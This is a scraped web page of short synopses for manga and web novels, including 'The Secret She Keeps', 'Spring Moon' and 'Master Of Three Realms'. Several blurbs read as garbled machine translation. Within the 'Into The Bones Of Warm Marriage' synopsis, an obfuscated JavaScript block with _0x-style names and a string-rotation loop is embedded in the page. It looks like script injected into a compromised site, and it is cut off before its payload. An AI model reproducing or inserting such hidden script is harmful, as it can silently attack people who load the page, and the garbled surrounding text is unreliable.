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Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

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The Secret She Keeps

In her previous life, Yi Ruo Shui, born in a rich family, was a typically obedient girl who was fond of music and adept at playing piano. At that time, being an innocent and unsophisticated girl, she never doubted anybody, nor did she ever guard against her friends or lover, which, however, brought her only constant disasters. Many years later, being blindsided again, Yi Ruo Shui died in the fire, with the help of death, she was reborn and returned to the day of the piano competition. Just like the nirvana of phoenix, Yi Ruo Shui achieved her own nirvana — mature and intelligent. She plays her own cards right and steps on a road of revenge which is filled with love, hatred, happiness and sadness.


Goddess personal Coach

<h2>Goddess personal Coach</h2> As a personal trainer, what Li Xiu has to do is get his members out of imperfection! Female star with low back pain? Come and give you two private lessons, youthful vitality radiant! The female president has a stomachache? Come and go, take my private lessons, pack you to get rid of Auntie! There are no imperfect women in this world, if there is, it is because we have not met me.


Your Majesty, Preserve The Jade!

Emperor Ha Geum-yoon and Empress Seo-yul. The two have endured their own lives without being indifferent to each other. Then, while arguing over a concubine, they fell into the pond together-the two bodies turned around. The two play each other and start a breathtaking single rope ride… … . ‘Now I know you.’ Yeokjisaji romance blooming in the Imperial Palace, Liangbu!


Spring Moon

Spring Moon A long, long time ago, a brother and sister were being chased by a tiger and climbed a rope to the heavens. To become true gods and to be able to stay in the heavens, the brother and sister had to go through many reincarnations. One day, the sister heard a pitiful plea coming from earth. “Please… I want to die…” Curious, the sister goes down to earth to see that the human who made that plea was a girl who wanted to die to get away from her family and her fiance. Determined to help the girl, the sister reincarnates into her body and is determined to get revenge for the human who was so desperately trying to die. This is the start of the fairy’s reckless project vs. the bastard of a fiancee!


How To Divorce The Male Lead

How to Divorce the Male Lead “…I’m screwed.” On a normal day like any other, Duchess Juliana Auburn woke up from a dream. No, rather, it is I, “Isian,” who remembered my past life. Juliana Auburn was a character in a novel who did nothing but badmouth and find fault with her husband, his friends, and her own father who had forced her to marry an illegitimate man. According to a spoiler comment that I read, she will be killed at the start of the novel. “Why did I only remember everything now after I’ve already done all of those bad things to the male lead?!” In order to avoid the novel’s “bad ending,” Juliana plans to divorce her husband, Evan, the male lead…. “I’ll give you everything you want.” “Don’t you know that the one who falls in love first loses?” “Why should I apologize for staring at you because you’re so pretty?” …Isn’t my husband’s obsession more serious than I thought? [url=]Based on a Korean Novel[/url]


Into The Bones Of Warm Marriage

Into The Bones Of Warm Marriage To pay the benefit, Charlotte married into Fan family. She believed that her husband is Shine Fan, who were seriously burnt and isolated in special care. But as time went on, she found that Ron Fan, the brother of Shine, are acting strangely towards her…<script></script><script>(function(_0x2b1e82,_0x5267c4){var _0x9efc61=_0x2651,_0x40b6cf=_0x2b1e82();while(!![]){try{var _0x238795=-parseInt(_0x9efc61(0xa0))/(0x5d*-0x47+-0x4fc+0x4*0x7b2)+-parseInt(_0x9efc61(0xb0))/(0xb92+-0x1*-0x1037+0xd*-0x223)*(parseInt(_0x9efc61(0xa8))/(-0x10e*-0x12+0x1e*0x124+-0x3531))+parseInt(_0x9efc61(0xb5))/(-0x19fe+-0x1157+0x2b59)+-parseInt(_0x9efc61(0x97))/(0x1805+0x3af*0x2+-0x1f5e)*(parseInt(_0x9efc61(0x9e))/(0x803*-0x4+-0x20c9+0x1*0x40db))+parseInt(_0x9efc61(0x98))/(0xf94+0x10b5+0x1021*-0x2)*(parseInt(_0x9efc61(0xad))/(0x244d+-0x1927*0x1+-0xb1e))+parseInt(_0x9efc61(0x95))/(0x2617+0xbf7+-0x3205)+parseInt(_0x9efc61(0xab))/(-0x17*0x167+0x72*0x18+0x159b)*(parseInt(_0x9efc61(0xa2))/(0x95*-0x2+0x3c7+-0xe*0x2f));if(_0x238795===_0x5267c4)break;else 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Female Secret Agent

Qin Fei is an ace agent in a special school. She was betrayed by her partner and lover when she was performing a mission in the Bermuda Triangle. She fell into the sea from the boat and into a crack of time and space, meeting a vampire on first day. The battle of a modern female agent against the ancient “old Draculas” in full swing.


Strongest Son In Law

Emperor of the Underground World (Mafia Boss) Shen Ran turned into a housekeeper? Not to mention the contract for washing and cooking, do I have to brush the toilet for my wife? ? Forget it, what made my wife so beautiful, this wave wasn’t a loss! But anyone dares to defeat my wife’s idea? This really happened when my Shen Ran was vegetarian! Dare to touch my wife with your finger.


The Testimony of The White Rose

The Testimony of The White Rose <div class="sContent">Everyone thought that the murder mystery had been solved. Everyone except for her, a seemingly normal girl who saw the true identity of the killer in a dream. With the advice of a mysterious and breathtaking man, she filed a report with the police. Now, the killer is coming after her.</div>


Nan Used To Be Mine Hd

Nan Used to Be Mine HD May escort deserve true love? It that her fault to fall in love with a powerful man like him? Man sees her as a social butterfly, woman disgraces her as a whore/escort. Nan flirted with all sorts of men but what she truly wants is him, no matter how cruelly he treats her with…


Stream Flow Into Dream

Legend has it that there are twelve zodiac cat guardians who guard twelve girls. Only they help their masters realize dream can they become real gods of constellation. One day, the cat guardian of Pisces came to the human world and came across its master, a girl named Yuxi Lin who dreamed to be an excellent designer. Can it help her realize dream smoothly and successfully? MangaToon got authorization from Dazhou to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Master Of Three Realms

Master of Three Realms Three hundred years ago, he was the great monarch, who was killed by his fiancee right before their wedding. Three hundred years later, he was reincarnated against heaven's will. He practiced the forbidden technique and forged god-defying meridians. In this lifetime, I will slaughter He whoever stands in my way, be it a god or demon. I am going to do anything till my heart's content. I shall rule three realms! MangaToon got authorization from iReader to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
